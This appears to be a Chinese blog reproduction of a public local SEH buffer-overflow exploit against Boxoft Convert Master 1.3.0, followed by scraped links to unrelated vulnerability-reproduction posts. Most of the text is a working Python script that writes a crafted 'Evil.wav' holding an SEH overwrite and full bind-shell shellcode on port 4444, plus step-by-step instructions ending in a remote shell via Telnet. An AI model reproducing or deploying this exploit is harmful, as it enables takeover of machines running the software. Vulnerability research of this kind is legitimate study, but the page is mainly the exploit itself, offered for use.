此次渗透测试针对软件
转换大师Boxoft Convert Master
‘wav’ SEH 本地攻击
实验平台:windows7
poc由Achilles提供
exp:

import structbuffer = "\x41" * 4132
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh  =  struct.pack('<L',0x6d00c683) #CDRip122.dll
nops =  "\x90" * 20
#Bind=shellcode port 4444
shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33"
"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
"\xc8\x28\x1b\xd5\x3f\x51")
payload = buffer + nseh + seh + nops + shellcodetry:f=open("Evil.wav","w")print "[+] Creating %s bytes evil payload.." %len(payload)f.write(payload)f.close()print "[+] File created!"
except:print "File cannot be created"

1.- Run python code :Boxoft_Convert_Master.py

2.- Open Boxoft_Convert_Master.exe

3.- Click try and Batch Convert Mode

4.- Add Evil.wav

5.- And you will have a bind shell port 4444

6.- Greetings go:XiDreamzzXi,Metatron

运行程序输出wav文件,此文件包含了shellcode,拖入转换大师中,程序崩溃,远程使用Telnet连接到windows7拿到shell。


二进制安全:转化大师漏洞复现:Boxoft Convert Master 1.3.0 - ‘wav‘ SEH Local Exploit相关推荐

  1. 【漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)

    0x01 漏洞概述 泛微e-office是泛微旗下的一款标准的协同移动办公平台. 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可 ...

  2. 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析

    年后趁着需要做安全测试系统不多的这个空档,学学python到处逛逛复现复现和分析一些简单的漏洞 --from Lyricbao 0x00 复现环境 phpstudy wordpress 4.4版本 Q ...

  3. thinkphp5.*远程命令执行漏洞复现

    ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http: ...

  4. Foxit Reader(福昕阅读器)(CVE-2020-14425)命令注入漏洞复现

    0x00简介 Foxit Reader,是一套用来阅读PDF格式文件的软件,由福建福昕软件所研发:2009年9月3日推出3.1.1 Build 0901最新版本.Foxit Reader是一套自由使用 ...

  5. Apache漏洞复现

    目录 1.Apache多后缀解析漏洞复现(apache_parsing_vulnerability) 漏洞防御 2.Apache换行解析漏洞复现(CVE-2017-15715) 漏洞防御 3.CVE- ...

  6. Java安全-Tomcat AJP 文件包含漏洞(CVE-2020-1938)幽灵猫漏洞复现

    Tomcat AJP 文件包含漏洞(CVE-2020-1938) CVE-2020-1938 又名GhostCat ApacheTomcat服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含 ...

  7. Winrar目录穿越漏洞复现

    Winrar目录穿越漏洞复现 1.漏洞概述 WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在Windows环境下的图形界面.2019年 2 月 20 日Check Point团队爆出了 ...

  8. golang 远程批量执行shell_S2061远程代码执行漏洞复现及批量检测脚本(CVE202017530)...

    声明 由于传播.利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,博鸿科技安全服务中心以及文章作者不为此承担任何责任. 博鸿科技安全服务中心拥有对此文章的修改和解释权 ...

  9. 漏洞复现 - - - Springboot未授权访问

    目录 一, 未授权访问是什么? 二,Actuator介绍 三,怎么进行漏洞发现呢? 四,实验环境 五,漏洞复现 1.通过访问env获取全部环境属性 2.通过/trace提供基本的http请求跟踪信息 ...

最新文章

  1. mysql ldap_OpenLDAP 使用MySQL作为数据库
  2. 服务器上装了安全狗后远程链接不上怎么解决
  3. 重磅 | 2017年全球最聪明公司排行榜TOP50,哪9家中国公司上榜?
  4. 收益 or 挑战?Serverless 究竟给前端带来了什么
  5. vue使用element ui实现下拉列表分页的功能!!!
  6. java面试题2021最新
  7. python2创建3个线程_用python创建一个线程需要多长时间
  8. bae java乱码_BAE安装HotNews Pro乱码解决方案
  9. java 预览图片_jquery实现图片预览的方法
  10. Pig 实现关键词匹配
  11. Kinect人体扫描的多级主动配准:从低质量到高质量
  12. MATLAB灰度显示和彩色显示
  13. matlab 韦布尔拟合,MATLAB数据拟合工具在数学建模中的简单应用
  14. Unable to find models.User with id xx
  15. 人类基因组大数据分析(大数据人工智能公司)
  16. 2020计算机专业评估,2020年计算机学科大学排名TOP50,实力强,毕业生认可度高...
  17. 【Excel】绘图案例_常见复合图:簇状图+堆积图+折线图
  18. SimpleDateFormat日期转换之12小时和24小时制
  19. java date 操作_java日期操作-java Date-java Calendar-嗨客网
  20. MTK平台安卓Q 10.0 camera驱动移植——sensor

热门文章

  1. javaScript取得当前元素的下一个元素
  2. CSUST2020集训队选拔赛题解
  3. Qt/C++编写安防视频监控系统20-录像机管理
  4. python中wxpy_wxpy:用 Python 玩转微信就是这么简单
  5. 彻底搞懂Python类属性和方法的调用
  6. STM32+SD卡的原理图绘制以及用32完成对SD卡的数据读取(fat文件模式)
  7. 用oFono来GPRS上网
  8. 用python识别条形码,二维码并且定位标注
  9. Go语言开发小技巧易错点100例(七)
  10. 【操作系统】课程设计:新增Linux驱动程序(重制版)